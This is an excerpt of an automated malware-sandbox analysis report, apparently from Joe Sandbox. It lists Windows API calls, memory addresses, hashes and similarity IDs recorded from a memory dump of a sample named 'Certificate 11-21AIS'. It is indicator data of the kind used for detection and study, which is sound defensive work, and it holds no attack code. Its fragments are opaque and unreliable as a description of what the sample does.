• Instruction ID: 1e771bdf9f0c23d2a3d2e96baaedc54632543a0b8d0bd6eef1918079673089c8
• Instruction Fuzzy Hash: BDD0C23238531832C21426AD6C0BFC4764CEB16B65F040016BB0CD56C349E6D58002DA
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 0093ACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0093AEBD
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: 7ddea57537a9d932d8811d3dc4c4c6a3b124fc63df5e44c91f8b9c0cab97430e
• Instruction ID: ab1031ec03c565b4cce6565940bc75d27429f98ae7e96a1072af6f4a37eb68ce
• Instruction Fuzzy Hash: FCE09B78C18109DFCB11DFA5DD44DECF7BCAB48300F109081E492B2260C7744A85DF21
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009286A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009286B5
  • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 03d2588585c21d40f48a36a764d341f8389c9802a51e01d9de0d47a5593eac87
• Instruction ID: 13e59b03278952385e0c1856b933ce17af0e50a23f21b153d521f80bba153067
• Instruction Fuzzy Hash: E8D0223A399314BBF22463709C0BFC67A089B40F20F000804B34DEA0C0C8E0E900D710
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009286E2
• PostMessageW.USER32(00000000), ref: 009286E9
  • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 3b8e07df7fc35e77df6083184334bc515935710a4ebf09a947894029663df1ea
• Instruction ID: 27a0add5b82846744828b7844cee9b900870b7b2d2dd6709ae709760f9d0ce55
• Instruction Fuzzy Hash: 91D0123A7DA3147BF26467709C0BFC67A189B45F21F114815B74DEA1D0C9E4F940D754